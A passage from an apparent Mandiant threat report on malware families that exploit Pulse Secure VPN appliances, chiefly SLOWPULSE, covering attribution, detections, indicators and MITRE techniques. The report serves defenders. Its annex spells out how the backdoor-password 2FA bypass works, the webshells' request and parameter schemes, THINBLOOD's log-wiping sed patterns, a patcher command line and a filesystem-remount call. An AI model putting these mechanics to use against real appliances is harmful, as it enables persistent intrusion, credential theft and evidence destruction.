persisting across upgrades, and maintaining access through webshells.</li> <li>The investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/" rel="noopener" target="_blank">CVE-2021-22893</a>, is responsible for the initial infection vector.</li> <li>Pulse Secure’s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware families and the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">Pulse Connect Secure Integrity Tool</a> for their customers to determine if their systems are impacted. A final patch to address the vulnerability will be available in early May 2021. Note that the mitigations address the exploited vulnerability only; whether an appliance has already been tampered with is a separate question, which is what the Integrity Tool is intended to answer.</li> <li>Pulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues.</li> <li>There is no indication the identified backdoors were introduced through a supply chain compromise of the company’s network or software deployment process.</li> </ul> <h4>Introduction</h4> <p>Mandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These families are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily related to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for the creation and deployment of these various code families.</p> <p>The focus of this report is on the activities of UNC2630 against U.S. Defense Industrial Base (DIB) networks, but detailed malware analysis and detection methods for all samples observed at U.S. 
and European victim organizations are provided in the technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances. Analysis is ongoing to determine the extent of the activity.</p> <p>Mandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC), and relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and mitigations for affected Pulse Secure VPN appliance owners.</p> <p>As part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well as the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">Pulse Connect Secure Integrity Tool</a> to assist with determining if systems have been impacted.</p> <h4>Details</h4> <p>Early this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the world. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse Secure VPN appliances in the affected environment.</p> <p>In many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However, based on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure vulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of <a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/" rel="noopener" target="_blank">CVE-2021-22893</a>.</p> <p>We observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments. 
In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance. This was done to accomplish the following:</p> <ol> <li>Trojanize shared objects with malicious code to log credentials and bypass authentication flows, including multifactor authentication requirements. We track these trojanized shared objects as SLOWPULSE and its variants.</li> <li>Inject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse Secure VPN appliance administrative web pages for the devices.</li> <li>Toggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.</li> <li>Maintain persistence across VPN appliance general upgrades that are performed by the administrator.</li> <li>Restore (unpatch) modified files and delete utilities and scripts after use to evade detection.</li> <li>Clear relevant log files utilizing a utility tracked as THINBLOOD based on an actor-defined regular expression.</li> </ol> <p>Items 3 through 6 matter for investigators: because the actor remounts the normally read-only filesystem, restores modified files after use, and clears logs with THINBLOOD, a single clean integrity check or an absence of appliance log entries does not rule out earlier tampering. Compare files against known-good versions and, where possible, rely on logs retained off the appliance.</p> <p>In a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a European organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We believe that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this.</p> <p>Due to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. 
We also note the possibility that one or more related groups are responsible for the development and dissemination of these different tools across loosely connected APT actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding, we included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.</p> <h4>SLOWPULSE</h4> <p>During our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE. This malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered variants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section; refer to the Technical Annex for more details.</p> <h5>SLOWPULSE Variant 1</h5> <p>This variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is provided by the attacker. The sample inspects login credentials used at the start of each protocol’s associated routine and strategically forces execution down the successful authentication path if the provided password matches the attacker's chosen backdoor password. Because the spoofing happens after the upstream server has already answered, the LDAP or RADIUS server's own logs still record the genuine result; the Detections and Mitigations section relies on that discrepancy.</p> <p><em>LDAP Auth Bypass</em></p> <p>The routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. 
This variant inserts a check against the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure1_0_ayeu.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 1: LDAP Auth Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p><em>RADIUS Two Factor Auth Bypass</em></p> <p>The routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This variant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the authentication server. 
If the backdoor password is provided by the attacker, the packet type and successful authentication status flags are overwritten to spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure2_0_ivmt.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 2: Radius-2FA Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 2</h5> <p><em>ACE Two Factor Auth Credential Logging</em></p> <p>This variant logs credentials used during the ACE-2FA authentication procedure DSAuth::AceAuthServer::checkUsernamePassword. 
Rather than bypassing authentication, this variant logs the username and password to a file for later use by the attacker.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure3_qswp.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 3: ACE Auth Credential Log</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 3</h5> <p><em>ACE Two Factor Auth Bypass</em></p> <p>This variant is responsible for bypassing the ACE-2FA logon procedure starting with DSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the routine responsible for verifying the username and password if the backdoor password is provided. 
With this modification the attacker can spoof successful authentication.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure4_meyx.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 4: ACE Auth Bypass Variant</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h5>SLOWPULSE Variant 4</h5> <p><em>RealmSignin Two Factor Auth Bypass</em></p> <p>This variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies the execution flow of a specific step of the login process to spoof successful authentication. 
We believe that this may be a two-factor authentication bypass.</p></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure5_bwvy.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 5: RealmSignIn 2FA Auth Bypass</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Attribution</h4> <p>We are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our understanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are proactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected appliances.</p> <p>Mandiant is able to assess that:</p> <ul> <li>UNC2630 targeted U.S. 
DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK from as early as August 2020 until March 2021. <ul> <li>We suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5.</li> </ul> </li> <li>UNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE, QUIETPULSE, and PULSEJUMP. <ul> <li>We do not have enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group.</li> </ul> </li> <li>We do not have enough information about the use of LOCKPICK to make an attribution statement.</li> </ul> <h5>UNC2630</h5> <p>UNC2630’s combination of infrastructure, tools, and on-network behavior appears to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government. Analysis is still ongoing to determine the full scope of the activity that may be related to the group.</p> <p>Although we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party has uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor APT5. While we cannot make the same connections, the third-party assessment is consistent with our understanding of APT5 and their historic TTPs and targets.</p> <p>APT5 has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances. 
They have also consistently targeted defense and technology companies in the U.S., Europe, and Asia.</p> <ul> <li>As early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in the embedded operating system of another technology platform.</li> <li>In 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private and government entities. During this intrusion, the actors downloaded and modified some of the router images related to the company’s network routers.</li> <li>Also during this time, APT5 stole files related to military technology from a South Asian defense organization. Observed filenames suggest the actors were interested in product specifications, emails concerning technical products, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).</li> <li>APT5 persistently targets high-value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.</li> </ul> <h4>Recommendations</h4> <p>All Pulse Connect Secure customers should assess the impact of the Pulse Secure mitigations and apply them if possible. Organizations should utilize the most recent version of Pulse Secure’s Integrity Assurance utility (the Pulse Connect Secure Integrity Tool referenced above) <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">released</a> on March 31, 2021. 
If a device fails this Integrity Assurance utility, network administrators should follow the <a href="https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755" rel="noopener" target="_blank">instructions in Pulse Secure's knowledge base article</a> and contact their Pulse CSR for additional guidance.</p> <p>Organizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti highly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service accounts can be used to authenticate through the affected appliance. Because SLOWPULSE and RADIALPULSE capture credentials on the appliance itself, including credentials entered in two-factor flows, any account that logged in through a compromised appliance should be treated as exposed even where MFA was enforced. A password reset alone does not remove a backdoor password embedded in a trojanized libdsplibs.so; that requires the integrity check and remediation steps above.</p> <p>Additional detections, mitigations and relevant MITRE ATT&amp;CK techniques are included in the Technical Annex. Sample hashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. YARA rules, Snort rules, and hashes are published on <a href="https://github.com/mandiant/pulsesecure_exploitation_countermeasures/" rel="noopener" target="_blank">Mandiant’s GitHub page</a>.</p> <h4>Detections and Mitigations</h4> <p>Each SHA256 hash below identifies the sample from which the indicators that follow it were derived.</p> <p>1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc</p> <ul> <li>HARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token= that may be accessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. 
This URL is not present in legitimate versions of this file.</li> </ul> <p>7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a</p> <p>68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2</p> <p>d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b</p> <ul> <li>PULSEJUMP, RADIALPULSE and PACEMAKER use the following files to record credentials: <ul> <li>/tmp/dsactiveuser.statementcounters</li> <li>/tmp/dsstartssh.statementcounters</li> <li>/tmp/dsserver-check.statementcounters</li> </ul> </li> </ul> <p>cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68</p> <ul> <li>The malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers responsible for LDAP and RADIUS auth and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging. This correlation catches the bypass variants; Variant 2 only logs credentials and lets authentication proceed normally, so it produces no such discrepancy and must be found on disk (see the /home/perl/PAUS.pm indicator below).</li> </ul> <p>a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1</p> <ul> <li>Upon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent (listed by their CGI environment variable names; on the wire, HTTP_X_KEY, HTTP_X_CNT and HTTP_X_CMD correspond to the request headers X-Key, X-Cnt and X-Cmd):</li> </ul> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table border="1" style="border-collapse:collapse;width:100%"> <tbody> <tr> <td style="width:43.0481%"> <p><strong>Key</strong></p> </td> <td style="width:56.9519%"> <p><strong>Value</strong></p> </td> </tr> <tr> <td style="width:43.0481%"> <p>REQUEST_METHOD</p> </td> <td style="width:56.9519%"> <p>POST</p> </td> </tr> <tr> <td style="width:43.0481%"> 
<p>HTTP_X_KEY</p> </td> <td style="width:56.9519%"> <p>&lt;BackdoorKey&gt;</p> </td> </tr> <tr> <td style="width:43.0481%"> <p>HTTP_X_CNT</p> </td> <td style="width:56.9519%"> <p>&lt;RC4Key&gt;</p> </td> </tr> <tr> <td style="width:43.0481%"> <p>HTTP_X_CMD</p> </td> <td style="width:56.9519%"> <p>&lt;RC4Command&gt;</p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> </div> </div> <p>1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd</p> <ul> <li>SLOWPULSE Variant 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\n.</li> </ul> <p>68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2</p> <ul> <li>PACEMAKER is saved at the file path /home/bin/memread</li> <li>Executed with the command-line flags -t, -m, -s</li> <li>Attaches to victim processes with ptrace and opens subfiles in /proc/</li> </ul> <p>88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079</p> <ul> <li>THINBLOOD creates the files: <ul> <li>/home/runtime/logs/log.events.vc1</li> <li>/home/runtime/logs/log.events.vc2</li> <li>/home/runtime/logs/log.access.vc1</li> <li>/home/runtime/logs/log.access.vc2</li> </ul> </li> <li>Executes the system API with the mv command specifying one of the files above, targeting: <ul> <li>/home/runtime/logs/log.access.vc0</li> <li>/home/runtime/logs/log.events.vc0</li> </ul> </li> <li>Executes the rm command specifying one of the .vc1 files above</li> </ul> <p>133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a</p> <ul> <li>SLIGHTPULSE uses /tmp/1 as its command execution log</li> <li>All POST requests to meeting_testjs.cgi are suspicious (the legitimate script services only GET requests)</li> <li>POST parameters: cert, img, name are used by malicious logic</li> <li>Responses to POST requests carrying the name parameter are returned with Cache-Control: no-cache and Content-type: image/gif</li> </ul> 
<p>1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9</p> <ul> <li>THINBLOOD executes sed on the files: <ul> <li>log.events.vc0</li> <li>log.access.vc0</li> <li>Log.admin.vc0</li> </ul> </li> <li>Sed patterns used: <ul> <li>s/.\x00[^\x00]*[^\x00]*\x09.\x00//g</li> <li>s/\x\x00[^\x00]*[^\x00]*\x09\x\x00//g</li> </ul> </li> </ul> <p>06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7</p> <ul> <li>The sample accepts an input and output file as its first and second arguments, then writes a patched version of the input out. The backdoor key is supplied as the third argument, and the command-line argument e or E must be supplied as the fourth argument. Example command line: <ul> <li>./patcher input.bin output.bin backdoorkey e</li> </ul> </li> </ul> <p>f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90</p> <ul> <li>The sample uses the HTTP query parameter id and responds with HTTP headers "Cache-Control: no-cache\n" and "Content-type: text/html\n\n".</li> </ul> <p>224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450</p> <p>64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7</p> <p>78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282</p> <p>705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f</p> <ul> <li>Executes sed on Pulse Secure system files</li> <li>Remounts the filesystem as writable: system("/bin/mount -o remount,rw /dev/root /"). On an appliance whose root filesystem is normally read-only, a remount to read-write is itself worth alerting on.</li> <li>Unexpected execution of other system commands such as tar, cp, rm</li> </ul> <h4>MITRE ATT&amp;CK Techniques</h4> <p>The following list of MITRE ATT&amp;CK techniques covers all malware samples described in this report as well as those observed throughout the lifecycle of UNC2630 and UNC2717.</p> <ul> <li>T1003-OS Credential Dumping</li> <li>T1016-System Network Configuration Discovery</li> <li>T1021.001-Remote Desktop Protocol</li> <li>T1027-Obfuscated Files or Information</li> <li>T1036.005-Match Legitimate Name or Location</li> <li>T1048-Exfiltration Over Alternative Protocol</li> <li>T1049-System 
Network Connections Discovery</li> <li>T1053-Scheduled Task/Job</li> <li>T1057-Process Discovery</li> <li>T1059-Command and Scripting Interpreter</li> <li>T1059.003-Windows Command Shell</li> <li>T1070-Indicator Removal on Host</li> <li>T1070.001-Clear Windows Event Logs</li> <li>T1070.004-File Deletion</li> <li>T1071.001-Web Protocols</li> <li>T1082-System Information Discovery</li> <li>T1098-Account Manipulation</li> <li>T1105-Ingress Tool Transfer</li> <li>T1111-Two-Factor Authentication Interception</li> <li>T1133-External Remote Services</li> <li>T1134.001 Access Token Manipulation: Token Impersonation/Theft</li> <li>T1136-Create Account</li> <li>T1140-Deobfuscate/Decode Files or Information</li> <li>T1190-Exploit Public-Facing Application</li> <li>T1505.003-Web Shell</li> <li>T1518-Software Discovery</li> <li>T1554-Compromise Client Software Binary</li> <li>T1556.004-Network Device Authentication</li> <li>T1592.004 Gather Victim Host Information: Client Configurations</li> <li>T1562 Impair Defenses</li> <li>T1569.002-Service Execution</li> <li>T1574 Hijack Execution Flow</li> <li>T1600-Weaken Encryption</li> </ul></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><section class="glue-modal glue-modal--dark QHdDac" role="dialog" aria-modal="true"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" alt="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure6_kzmg.max-1300x1300.png" jsname='P3Vluc' jsaction="click:HTIlC" loading="lazy"/><button 
class="glue-modal__close-btn" tabindex="0" aria-label="Close this modal"></button></section></section></figure><div class="nRhiJb-cHYyed nRhiJb-DbgRPb-R6PoUb-ma6Yeb ZpqjUe"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><p>Figure 6: MITRE ATT&amp;CK Map</p></span></div></section></div></section><section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"><span class="dQQu7c" jsaction="rcuQ6b:npT2md" jscontroller="YSybTb" data-track-type="" soy-skip ssk='5:kbe95'><h4>Technical Annex</h4> <h5>SLIGHTPULSE</h5> <p>The file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a webshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of the legitimate logic to respond to POST requests. Given its file-write and command-execution capabilities, we believe this webshell may have been used to place the additional webshells and to modify the legitimate system components from which the other observed malware families were produced.</p> <p>The malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests expected of the legitimate code. GET requests still reach the legitimate logic, so the script continues to serve its normal function. POST requests have a series of parameters checked for existence to determine which command to invoke. 
This logic is:</p> <p> </p> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"> <div style="color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%"><table> <tbody> <tr> <td style="border:1px solid #000000;padding:16px"><strong>POST params</strong></td> <td style="border:1px solid #000000;padding:16px"><strong>Invoked Command</strong></td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">cert</td> <td style="border:1px solid #000000;padding:16px">writefile</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">img, name with nonempty value</td> <td style="border:1px solid #000000;padding:16px">readfile</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">img set to empty string "", name</td> <td style="border:1px solid #000000;padding:16px">execcmd</td> </tr> <tr> <td style="border:1px solid #000000;padding:16px">anything else</td> <td style="border:1px solid #000000;padding:16px">invoke original legitimate logic</td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div></span></section><section class="QzPuud"><div><section><figure class="NEBdNd"><section class="PBkdHd DhGbH" jscontroller="SCGBie" jsaction="rcuQ6b:npT2md"><img class="JcsBte mZzdH ZOnyjc" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/pulse-secure7_fdud.max-1300x1300.png" 